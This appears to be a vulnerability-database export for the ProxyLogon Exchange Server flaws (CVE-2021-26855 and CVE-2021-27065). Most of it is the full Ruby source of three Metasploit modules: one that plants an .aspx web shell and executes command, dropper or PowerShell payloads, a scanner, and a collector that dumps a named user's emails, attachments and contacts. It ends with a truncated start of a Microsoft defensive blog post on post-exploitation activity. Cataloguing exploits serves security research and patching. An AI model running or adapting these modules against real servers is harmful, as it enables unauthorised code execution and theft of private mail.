encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxylogon_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:41", "description": "This module scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065). As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T13:37:20", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/exchange_proxylogon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Scanner',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check.', 'POST', ['GET', 'POST']])\n ])\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def run_host(target_host)\n @proto = (ssl ? 'https' : 'http')\n\n uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n received = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => uri,\n 'cookie' => 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'\n })\n unless received\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if received && (received.code != 500 && received.code != 503)\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error(\"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if received.headers['X-CalculatedBETarget'] != 'localhost'\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error('Could\\'t obtain a correct \\'X-CalculatedBETarget\\' in the response header.')\n\n return Exploit::CheckCode::Safe\n end\n\n print_good(message('The target is vulnerable to CVE-2021-26855.'))\n msg = \"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/exchange_proxylogon.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:39", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T19:52:01", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/exchange_proxylogon_collector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By taking advantage of this vulnerability, it is possible to dump all\n mailboxes (emails, attachments, contacts, ...).\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'GreyOrder', # PoC (https://github.com/GreyOrder)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author independent researcher (work at Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/'],\n ['URL', 'https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid'],\n ['URL', 'https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Actions' => [\n [\n 'Dump (Contacts)', {\n 'Description' => 'Dump user contacts from exchange server',\n 'id_attribute' => 'contacts'\n }\n ],\n [\n 'Dump (Emails)', {\n 'Description' => 'Dump user emails from exchange server'\n }\n ]\n ],\n 'DefaultAction' => 'Dump (Emails)',\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptBool.new('ATTACHMENTS', [true, 'Dump documents attached to an email', true]),\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check (only).', 'POST', ['GET', 'POST']]),\n OptString.new('TARGET', [false, 'Force the name of the internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 2147483647])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def dump_contacts(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(action['id_attribute']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{action['id_attribute']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:ContactsFolder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{action['id_attribute']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:ContactsFolder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of contact found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of contact recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n response = send_xml('POST', ssrf, soap_listitems(action['id_attribute'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n data = xml.xpath('//t:Items/t:Contact', XMLNS)\n if data.empty?\n print_status('The user has no contacts')\n else\n write_loot(\"#{datastore['EMAIL']}_#{action['id_attribute']}\", data.to_s)\n end\n end\n end\n\n def dump_emails(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(datastore['FOLDER']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{datastore['FOLDER']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{datastore['FOLDER']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of email recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n download_items(total_count, ssrf)\n end\n end\n\n def download_attachments(item_id, ssrf)\n response = send_xml('POST', ssrf, soap_listattachments(item_id))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).each do |item|\n item_id = item.at_xpath('./t:AttachmentId', XMLNS)&.values&.at(0)\n\n response = send_xml('POST', ssrf, soap_downattachment(item_id))\n data = Nokogiri::XML.parse(response.body)\n\n filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS)&.content\n ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS)&.content\n content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS)&.content\n\n print_status(\" -> attachment: #{item_id} (#{filename})\")\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(content), filename, ctype)\n end\n end\n\n def download_items(total_count, ssrf)\n response = send_xml('POST', ssrf, soap_listitems(datastore['FOLDER'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Items/t:Message', XMLNS).each do |item|\n item_info = item.at_xpath('./t:ItemId', XMLNS)&.values\n next if item_info.nil?\n\n print_status(\"Download item: #{item_info[1]}\")\n\n response = send_xml('POST', ssrf, soap_downitem(item_info[0], item_info[1]))\n data = Nokogiri::XML.parse(response.body)\n\n email = data.at_xpath('//t:Message/t:MimeContent', XMLNS)&.content\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(email))\n\n attachments = item.at_xpath('./t:HasAttachments', XMLNS)&.content\n if datastore['ATTACHMENTS'] && attachments == 'true'\n download_attachments(item_info[0], ssrf)\n end\n print_status\n end\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_xml('POST', \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", soap_autodiscover)\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.empty?\n\n server = ''\n owa_urls = []\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n\n next unless type == 'WEB'\n\n item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|\n owa_urls << owa_url.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n fail_with(Failure::NotFound, 'No \\'OWAUrl\\' was found') if owa_urls.empty?\n\n return([server, legacy_dn, owa_urls])\n end\n\n def send_http(method, ssrf, data: '', ctype: 'application/x-www-form-urlencoded')\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'cookie' => \"X-BEResource=#{ssrf};\",\n 'ctype' => ctype\n }\n request = request.merge({ 'data' => data }) unless data.empty?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_xml(method, ssrf, data, ctype: 'text/xml; charset=utf-8')\n send_http(method, ssrf, data: data, ctype: ctype)\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def soap_countitems(folder_id)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{folder_id}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listattachments(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:AdditionalProperties>\n <t:FieldURI FieldURI=\"item:Attachments\" />\n </t:AdditionalProperties>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{item_id}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listitems(folder_id, max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{folder_id}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downattachment(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetAttachment>\n <m:AttachmentIds>\n <t:AttachmentId Id=\"#{item_id}\" />\n </m:AttachmentIds>\n </m:GetAttachment>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downitem(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(type, data, name = '', ctype = 'text/plain')\n loot_path = store_loot(type, ctype, datastore['RHOSTS'], data, name, '')\n print_good(\"File saved to #{loot_path}\")\n end\n\n def run\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn, owa_urls = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n print_status(\"Internal target(s): #{owa_urls.join(', ')}\")\n\n # selecting target\n print_status(message('Selecting the first internal server to respond'))\n if datastore['TARGET'].nil? || datastore['TARGET'].empty?\n target = ''\n owa_urls.each do |url|\n host = url.split('://')[1].split('.')[0].downcase\n next unless host != server_name.downcase\n\n response = send_http('GET', \"#{host}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\")\n next unless response.code == 200\n\n target = host\n print_good(\"Targeting internal: #{url}\")\n\n break\n end\n fail_with(Failure::NotFound, 'No internal target was found') if target.empty?\n else\n target = datastore['TARGET']\n print_good(\"Targeting internal forced to: #{target}\")\n end\n\n # run action\n case action.name\n when /Dump \\(Contacts\\)/\n print_status(message(\"Attempt to dump contacts for <#{datastore['EMAIL']}>\"))\n dump_contacts(target)\n when /Dump \\(Emails\\)/\n print_status(message(\"Attempt to dump emails for <#{datastore['EMAIL']}>\"))\n dump_emails(target)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/exchange_proxylogon_collector.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2021-03-26T05:28:04", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and 